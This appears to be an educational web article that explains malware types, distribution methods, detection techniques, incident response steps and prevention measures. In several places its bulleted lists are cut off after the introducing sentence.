Malware, short for malicious software, is any software intentionally designed to harm, exploit, or otherwise compromise devices, networks, or data. Cybercriminals use malware to steal sensitive information, disrupt operations, gain unauthorized access, or demand ransoms from individuals or organizations.
Malware comes in various types, each with different goals, from minor annoyances to serious security threats. Common types like viruses and worms spread quickly without user input, while Trojans disguise themselves as safe software to cause harm.
Ransomware locks files and demands payment to unlock them. Adware can lead to malvertising, using legitimate sites to spread harmful code. New threats like cryptojacking secretly mine cryptocurrency on a computer. This range of malware, including keyloggers and rootkits, highlights the need for strong cybersecurity measures.
There are two main categories of adware: simply annoying strains and those that carry a malicious payload (i.e., malvertising). Malvertising is often delivered by injecting malicious code into legitimate websites or online ads.
The primary objective of non-malicious adware is to illegally generate revenue by pushing unwanted online ads to users through ad networks. When users of an infected computer perform specific actions, they are subjected to unwanted pop-up messages and ads.
Malvertising is more insidious. It can be used in many ways, such as spreading malware, installing additional malware (e.g., Trojan horses and spyware), directing users’ browsers to malicious websites, launching attacks, or modifying a system’s settings to gain additional access or perform other malicious activities.
Short for “robot networks,” botnets are networks of infected computers. The attacking parties typically control them remotely using command-and-control (C2C) servers. Botnets are highly versatile and adaptable, maintaining resilience through redundant servers and relaying traffic through infected computers.
Botnets are used for many malicious purposes. Threat actors use botnets to launch distributed denial-of-service (DDoS) attacks, send spam and phishing emails, conduct credential theft, exfiltrate data, and perpetrate click fraud. Several of the most well-known botnets are Mirai, Zeus, and Storm.
Threat actors use cryptojacking attacks to co-opt the processing power of users’ devices, without their knowledge or consent, to perform the complex calculations necessary to mine cryptocurrency. Cryptojacking cripples device performance by hijacking bandwidth for cryptomining. This illegal activity not only leads to higher energy costs due to increased power consumption, but can also cause irreversible damage to systems due to excessive use.
Fileless malware is a type of malware that uses processes, applications, and tools within the operating system to execute its payload and persist in memory. It is ultra stealthy because it interacts with a system’s operating system and does not leave a footprint. Additionally, since this malware operates from the system’s computer’s memory instead of installing files, it is more difficult to detect.
Keyloggers capture a user’s keystrokes. While there are some legitimate uses for keyloggers, such as monitoring employees’ activity, they are primarily used by cybercriminals to steal credentials or sensitive information. Most keyloggers are implemented using a Trojan horse, but in some cases, they are set up with physical connections to devices.
A logic bomb is like a digital time bomb. This type of malware is automatically activated when specific criteria are met. For instance, a logic time bomb can be triggered based on a specific day or time or after a specified repetition (e.g., 10th login or when a browser launched).
Logic bombs can remain dormant and are often hidden within legitimate software to evade detection. Once activated, logic bombs can execute nearly any malicious activity, from encrypting hard drives to deleting files.
Fileless malware attacks are cyberattacks that do not depend on traditional executable files to deliver and execute malicious code. Instead, these attacks exploit existing legitimate software, processes, and vulnerabilities within a system to carry out their activities. This approach makes them more challenging to detect and remove because they do not leave behind conventional file-based signatures that antivirus solutions typically look for.
Explore the dangers of fileless malware attacks and why they are difficult to detect: What are fileless malware attacks?
Ransomware is a damaging malware, as evidenced by Wannacry, which infected hundreds of thousands of computers in more than 150 countries within its first week in the wild. When executed, ransomware encrypts data and demands a ransom to unencrypt it. Since it leverages powerful encryption, ransomware attacks render targeted systems unusable and data inaccessible.
Due to the anonymity afforded by cryptocurrency and third-party management of ransomware programs, ransomware has become highly accessible through ransomware-as-a-service offerings. The use of ransomware is widespread, with culprits spanning individual cybercriminals, crime syndicates, and nation-state threat actors.
RATs were initially created for legitimate remote access purposes (e.g., remote work and IT support) but are now used by cybercriminals. This type of malware enables a remote user (i.e., cybercriminal) to gain administrative rights to control a system remotely.
Because the rights granted are the highest level, a threat actor can conduct nearly any action desired using RATs. These tools are also difficult to detect because they are not usually included on lists of running programs and tasks, or their actions appear to be related to legitimate programs.
A rootkit provides privileged (i.e., root-level) access to a system and hides in the operating system, giving threat actors a back door into the system. This access allows the cybercriminal to maintain command and control over a computer for an extended period without being detected.
Rootkits are associated with advanced persistent threats (APTs) and can give the threat actor complete control over the infected computer. Once installed, rootkits monitor activity, steal information, and launch attacks. Originally, rootkits were delivered using a Trojan horse, but they are increasingly embedded and deployed through legitimate software.
Playing off of users’ fears, scareware displays menacing alarms to trick users into scams. For example, scareware often sends messages telling users their system is infected with malware and spoofing legitimate antivirus software providers to trick users into paying for a “remedy.”
Spyware is installed without users’ knowledge. It collects information from infected systems, such as activities performed, financial data, credentials, communications, personal information, and browsing history, and communicates it back to the cybercriminal. Examples of spyware include botnets, adware, and keyloggers.
A trojan horse, also known as a Trojan horse, is a type of malware designed to present itself as a legitimate program or file and trick users into installing it. Trojans are usually distributed and deployed using social engineering tactics like phishing. Once installed, the Trojan only takes action when promoted by the threat actor responsible for it.
Trojans can be programmed to take any number of actions, from stealing sensitive data to establishing backdoor access to systems. While Trojans can cause significant damage (e.g., EMOTET, which was globally active for a decade), unlike worms and viruses, they are not designed to self-replicate.
A computer virus is designed to self-replicate and spread across networks to other systems without users’ knowledge. Viruses are embedded in files and activated when a user opens the file.
Threat actors can use viruses to perform malicious activities, such as shutting down systems, damaging, modifying, deleting files, or granting unauthorized access. These can be executed in real time or delayed to allow the virus to spread undetected. The most common file types used to spread viruses are documents, spreadsheets, executables, zip files, and HTML files.
Worms are one of the most common and most dangerous types of malware. They are considered especially dangerous because they can replicate themselves without being attached to malicious programs or run by a user. Another troublesome characteristic of worms is that they usually go undetected once enough has been created to impact bandwidth or consume a noticeable amount of resources.
While malware and exploits are commonly used in cyberattacks, they serve distinct roles and function differently. Malware is any software designed to damage, disrupt, steal, or gain unauthorized access to data and systems.
An exploit is a piece of code or a technique attackers use to exploit vulnerabilities or weaknesses in software, hardware, or a system to achieve malicious objectives. Exploits are not malicious software but tools or methods used to execute attacks, often delivering malware as part of the process. Exploits manipulate system behavior by abusing security flaws, enabling unauthorized actions or malware deployment.
Discover the differences between malware and exploits in detail: What is Malware vs. Exploits?
Malware's success depends on its effective distribution. Depending on the type of malware and its objectives, several distribution models are used, including the following.
Malware spread through a drive-by download is usually installed without a user’s knowledge when they visit a website, which can be a legitimate site that has been compromised or a malicious site.
A drive-by download can also occur if a user accidentally clicks a malicious link. With drive-by downloads, bundles of files or software are automatically downloaded to breach the user’s system.
Man-in-the-middle (MitM) attacks occur when an attacker inserts themselves between two parties’ communication without their knowledge. Once communication interception has been established, cyber attackers can eavesdrop to steal sensitive information, alter messages, or impersonate one of the parties to trick users into executing a financial transaction (e.g., granting account access or transferring money).
A widely used type of man-in-the-middle attack is spoofing Wi-Fi networks, known as an evil twin attack. With this type of man-in-the-middle attack, victims are tricked into connecting to a Wi-Fi network managed by a threat actor.
Evil twins are popular among cybercriminals because they are easy to set up and use. They are often set up in public areas like airports or libraries. They can be set up using a smartphone or other mobile device and employ malware readily available on the dark web.
Despite infinite warnings, users continue to fall for infected removable media schemes where devices infected with malware are left for users to find. Once a USB stick or other removable is connected to the user’s system, malware is automatically installed.
Phishing attacks are one of the most widely used vectors for malware attacks. Malicious emails disguised as legitimate messages trick users into clicking malicious links or files. Once the user clicks, malware is delivered and installed.
A file can be used to quickly malware to spread malware through infected files stored in the system. Threat actors often co-opted the standard Internet file system (SMB/CIFS) and network file system (NFS) to distribute malicious files. When users open the infected file, the malware is executed and installed on their system.
Regardless of the type or method of distribution, malware has one overarching objective—to exploit devices to benefit a cyber attacker. The motivations behind these attacks vary, but several of the most common reasons malware is used are to:
In addition to alerts from anti-malware and antivirus software, a number of signs can indicate the presence of malware on a system. Common signs of a malware infection include:
Despite the best efforts of security teams, malware inevitably sneaks into organizations and impacts systems. Early detection of malware minimizes its spread and mitigates potential damage. Most organizations use a combination of techniques to detect malware, including the following.
Like blocklisting, application allowlisting requires administrators to specify a list of approved applications that can run on users' systems or the network. Any application not on the application allowlist is prohibited from running as it is deemed a potential malware vector.
Machine learning (ML) and deep learning types of artificial intelligence (AI) are increasingly used to detect malware based on behavior analysis. AI-powered tools can analyze file behavior to identify patterns that indicate malware. These insights enable the detection of evolving and zero-day malware.
Checksums are an enhanced type of signature analysis that assesses files to confirm their integrity or detect malware. A cyclic redundancy check (CRC) is a common type of checksum that analyzes the value and position of a group of data. This approach streamlines signature analysis by eliminating the need to maintain and compare against an extensive database. Other checksums include reduced masks, known plaintext cryptanalysis, statistical analysis, and heuristics.
File entropy detection tools measure file data changes to detect malware executables. This allows security teams to identify dynamic malware that changes frequently to evade detection.
Malicious files used to deliver malware can be filtered based on file extensions. Blocking files based on file extensions is not foolproof, as legitimate files can be blocked, and malicious ones can sneak through. However, it is used as a part of malware prevention programs. Blocklists can include any number or type of file, but the ones most commonly blocked are executables (e.g., .exe) and macros (e.g., XLSM).
Honeypots are decoys used to lure attackers and detect malware. These tools pretend to be legitimate applications or APIs that attackers would target. Honeypots allow security teams to detect malware in a controlled environment.
Dynamic monitoring for mass file operations can detect malware, like copying, renaming, or deleting files. This rule-based approach helps security teams minimize damage by identifying malware behavior and tracking its source.
Recursive unpacking is used to uncover malware nested in content (e.g., files and URLs) included in email messages, shared via cloud-based tools (e.g., collaboration and file sharing tools), or stored on cloud storage platforms. This approach detects malware even if it is deeply embedded and hidden.
Although it is limited to known types of malware, signature-based detection is widely used. This approach quickly and effectively detects a significant portion of malware, as most threat actors tend to use tried-and-true tools due to the complexity and expense of creating new malware.
Each type of malware has a unique signature comprised of hashes, file size, strings, indicators of compromise (IOCs), and other identifying characteristics. Signature-based detection tools continually scan systems looking for known malware signatures.
Tools can examine a suspicious file’s code to determine if it contains malware without running the file and unleashing the malicious code. If malware is suspected, dynamic malware analysis tools execute the malicious code in an isolated area or sandbox. Findings from the analysis are used to scan systems to detect other instances of the malware.
When security teams have an incident response plan, malware response and removal are expedited. A standard incident response plan for malware detection includes the following steps. As with any incident response plan, these steps should be customized and augmented to fit an organization’s resources and processes.
As soon as malware is detected, steps need to be taken to contain it. Isolate the infected system: Disconnect from the network to prevent further spread. This includes using security tools to terminate suspicious or malicious processes and antivirus/antimalware tools to remove the malware.
Malware indicators of compromise (IOCs) should be reviewed to determine the type and actions taken to direct remediation efforts. This step also includes determining which systems have been affected by the malware.
Based on the analysis of the IOCs, security teams need to triage the recovery efforts. This means prioritizing the malware response based on the scale of the malware incident and the importance of impacted systems relative to other open security incidents.
Anyone in the organization whose systems could have been infected with the malware should be notified and given clear instructions on how to facilitate the remediation efforts. If the malware results in a data breach, external parties must be notified according to compliance requirements.
If antivirus and antimalware tools do not handle it automatically, the malware must be removed from all impacted systems. Then, all infected systems should be wiped, a new operating system should be installed, and data should be restored from backup. Before restoring from the backup, confirm that the backup has not been infected.
Once the malware has been neutralized and systems restored, security teams must gather forensic evidence for the incident case file. This facilitates further investigation, meets compliance requirements, and supports legal actions.
Following a malware incident, security teams need to review what happened and assess how security systems perform to identify areas for improvement. In addition, lessons learned and information gathered about the malware should be integrated into databases and processes.
Combatting malware requires security teams to leverage a combination of tools and tactics. The following are several of the many that can be used to protect organizations from malware and prevent it from doing damage.
A fundamental tenet of Zero Trust security, the principle of least privilege, restricts users’ access to only the minimum needed to perform their tasks for as long as necessary. This limits exposure if malware compromises a system.
Security awareness training should include sections on social engineering tactics to spread malware and best practices for avoiding becoming a victim. Prompt tests should also evaluate users’ understanding and ability to identify phishing attacks. Training programs should be conducted annually, with ongoing communication and testing to reinforce key malware-related messages.
All systems should be continuously monitored to identify any usual behavior that could be a sign of malware. This allows security teams to take steps to neutralize malware as quickly as possible.
Security policies should include specific directives to help users avoid malware traps. Examples of security directives that can help prevent malware attacks are rules about which systems must have antivirus and anti-malware software, requirements for software installation, and a removable media policy.
Organizations need comprehensive security tools to protect against cyber security threats, including malware. Tools that are proven to help protect systems from malware include:
Use network segmentation to divide the network into smaller segments that are partitioned using internal firewalls and access policies. This prevents lateral movement if malware infiltrates a segment. Micro-segmentation prevents the spread of malware and minimizes potential damage.
Regular security audits help security teams proactively identify and address vulnerabilities that malware can exploit. Particular attention should be paid to potential entry points for attacks, unused accounts and devices, and misconfigurations.
Because some malware targets backup systems, extra security measures are essential to prevent this. Several proven approaches for securing backup data are creating an isolated environment with controlled access (e.g., air gapping), using the 3-2-1 backup rule (e.g., having three copies of backups—storing backups on two types of media and keeping one copy of backups offsite), and using encryption to secure backups.
All user accounts must have strong, unique passwords that follow best practices for length, complexity, and expiration. Using a secure password management tool can facilitate strong passwords and avoid poor cyber hygiene practices (e.g., saving strong passwords in contacts) that could allow them to be compromised by malware.
Malware is continuously evolving and being created. Threat intelligence services can help ensure that security teams are aware of recent variants, attack tactics, and strategies to stop them.
A core best practice for preventing malware is installing system and software patches and updates promptly. This should include all operating systems, software tools, browsers, and plug-ins.
Multi-factor authentication, even two-factor authentication, adds security layers, making it nearly impossible for threat actors to gain unauthorized access using malware. Even if malware (e.g., a keylogger) can steal a user’s password, the additional verification prevents a cybercriminal from gaining access.
Deep dive into malware variants and how to protect your organization: What is Malware Protection?
There are several types of malware, including:
Malware spreads through various methods, including:
Organizations can protect themselves from malware by implementing several security measures:
If your computer is infected with malware, you should:
If you think your computer has malware, you can report it to: